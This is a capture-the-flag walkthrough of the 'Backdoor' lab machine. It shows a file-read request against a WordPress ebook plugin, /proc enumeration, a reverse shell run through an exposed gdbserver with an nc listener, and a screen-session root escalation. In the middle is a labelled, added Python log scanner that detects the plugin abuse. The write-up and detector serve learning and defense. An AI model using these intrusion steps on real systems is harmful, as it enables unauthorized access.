Hello everyone,
Today I'll show you how I pwned the Backdoor machine.
Recon Steps
First of all, after getting the IP, I started a port scan to find out which ports are open: nmap -sC -sV IP
Okay, we have only 2 open ports: 22 and 80.
Looking at the nmap output above, port 80 runs Apache 2.4.41 with WordPress.
So I checked port 80; it was a website with nothing on it.
I started directory brute-forcing: dirsearch -u backdoor.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
I found these important directories. Starting with /wp-login, I brute-forced the admin password for about 1 hour and got 0 passwords. Rabbit hole.
So I decided to move on to another directory, /wp-includes; it has many of the common directories and files of the WordPress framework. I checked many of them, but nothing there is important.
Now let's move to the main one, /wp-content. I know that this directory has many subdirectories under it holding all the content for the site: plugins, downloads, uploads, etc.
So I started directory brute-forcing on it to find out which directories are available to me:
dirsearch -u backdoor.htb/wp-content/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
After finding those directories and searching through them, this was the important one I found: the ebook-download plugin.
I started using it to read files like /etc/passwd and ../../../wp-config.php:
GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd HTTP/1.1
Host: backdoor.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Now, searching for a way to get RCE from the LFI in the download parameter, I found nothing, but I found that I can list all processes running on the system; maybe one of them is vulnerable.
I can get a list of processes and their PID numbers from /proc/sched_debug.
I can go deeper and see which processes are running from a command line via /proc/PID/cmdline; any process that has this file means it's running in a terminal.
As we know, a process running in a terminal must have an owner and a shell type.
So here we are searching for a PID that has any of these three things:
a cmdline file, a bash or sh shell, and an owner user from the list we got from /etc/passwd.
If we go back to step (1) and search for bash, we will find 3 matches.
So, let's focus on those 3 first.
I changed the LFI path to /proc/4874/cmdline.
Now I see that there is a gdbserver service running on 0.0.0.0:1337, which means this port was open but didn't appear to us in the port scan.
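A defender-side check for the plugin abuse shown above (the LFI requests against filedownload.php and the /proc enumeration through the same parameter), added here as an example that is not part of the original writeup: a Python script that scans Apache access-log lines for requests to the ebook-download plugin whose ebookdownloadurl value escapes the ebook directory. The log lines, client IPs and timestamps are constructed samples, and one request is double-encoded to show the normalization step.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample Apache access-log lines (not from the original post);
# the first four mirror the LFI requests described in the writeup.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Jan/2022:10:01:12 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd HTTP/1.1" 200 2471
10.10.14.5 - - [10/Jan/2022:10:01:40 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3102
10.10.14.5 - - [10/Jan/2022:10:02:03 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/sched_debug HTTP/1.1" 200 81920
10.10.14.5 - - [10/Jan/2022:10:02:30 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%252Fproc%252F4874%252Fcmdline HTTP/1.1" 200 64
192.168.1.20 - - [10/Jan/2022:10:03:00 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=ebooks/sample.pdf HTTP/1.1" 200 100233
192.168.1.21 - - [10/Jan/2022:10:03:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4512
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = "/wp-content/plugins/ebook-download/filedownload.php"
PARAM = "ebookdownloadurl"

def normalize(value: str) -> str:
    """Undo repeated percent-encoding and backslash separators before inspection."""
    v = value
    while (decoded := unquote(v)) != v:
        v = decoded
    return v.replace("\\", "/")

def classify(value: str) -> "str | None":
    """Return why a download value looks like file-read abuse, or None if benign."""
    v = normalize(value)
    if v.startswith("/proc/"):
        return "proc-enumeration"   # /proc/sched_debug, /proc/PID/cmdline
    if "../" in v or v.startswith("/"):
        return "path-traversal"     # /etc/passwd, ../../../wp-config.php
    return None

def scan(log_text: str) -> list:
    """Return one finding per plugin request whose parameter escapes the ebook directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        url = urlparse(m["target"]) if m else None
        if url is None or url.path != VULN_PATH:
            continue
        for value in parse_qs(url.query).get(PARAM, []):   # parse_qs decodes once
            reason = classify(value)
            if reason:
                hits.append({"ip": m["ip"], "ts": m["ts"], "reason": reason,
                             "value": normalize(value)})
    return hits
```

Run scan(SAMPLE_LOG) to get the four abusive requests; the benign ebook download and the unrelated /wp-login.php hit are skipped.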
Searching for an exploit with searchsploit gdbserver, I found one (Ref),
but I used another way: the gdb tool pre-installed in Parrot OS.
We will create our reverse shell file using msfvenom first.
$ gdb
(gdb) target extended-remote 10.10.11.125:1337
(gdb) remote put rev.elf shell.elf
(gdb) set remote exec-file shell.elf
--> after this step we must start a listener in another terminal
# nc -nlvp 4444
--> now we can run our elf file on the target machine from gdb
(gdb) run
Privilege Escalation
After we have a shell, since we don't have the user's password we can't run sudo -l,
so we check for SUID binaries: find / -perm /4000 2>/dev/null
I found only one SUID binary that we can run as root; after running it I become root:
/usr/bin/screen -x root/root
Congrats!!!!! You are root.
Tips:
Don't focus on getting RCE from the vuln you found; maybe there is another way you can use to get into the target machine.
Use your mindset before using your hacking skills.